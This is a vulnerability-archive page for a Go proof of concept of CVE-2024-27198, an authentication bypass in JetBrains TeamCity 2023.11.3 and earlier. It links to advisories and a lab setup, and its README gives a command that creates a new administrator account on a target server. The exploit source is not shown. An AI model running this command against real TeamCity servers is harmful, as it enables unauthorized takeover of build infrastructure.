Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-27198 PoC — JetBrains TeamCity 安全漏洞

Source
https://github.com/rampantspark/CVE-2024-27198
Associated Vulnerability
Title:JetBrains TeamCity 安全漏洞 (CVE-2024-27198)
Description:In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible
Description
A PoC for CVE-2024-27198 written in golang
Readme
## CVE-2024-27198

### Auth bypass for TeamCity Server version 2023.11.3 and below.

![image](https://github.com/rampantspark/CVE-2024-27198/assets/80992075/1b6dceb9-d0fa-46af-8667-d68f425fa29f)


**NIST:** https://nvd.nist.gov/vuln/detail/CVE-2024-27198

**Rapid7 blog post:** https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

### Example Usage

```
go run CVE-2024-27198.go -h
  -s string
    	TeamCity Server
  -p string
    	New admin password
  -u string
    	New admin username
  -proxy
        Proxy URL (optional)
```

```
go run CVE-2024-27198.go -s http://IP_OR_FQDN:PORT -u new_admin_username -p new_admin_password -proxy http://IP_OR_FQDN:PORT
```


*Please Refer to https://github.com/yoryio/CVE-2024-27198 for instructions on setting up a lab environment.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →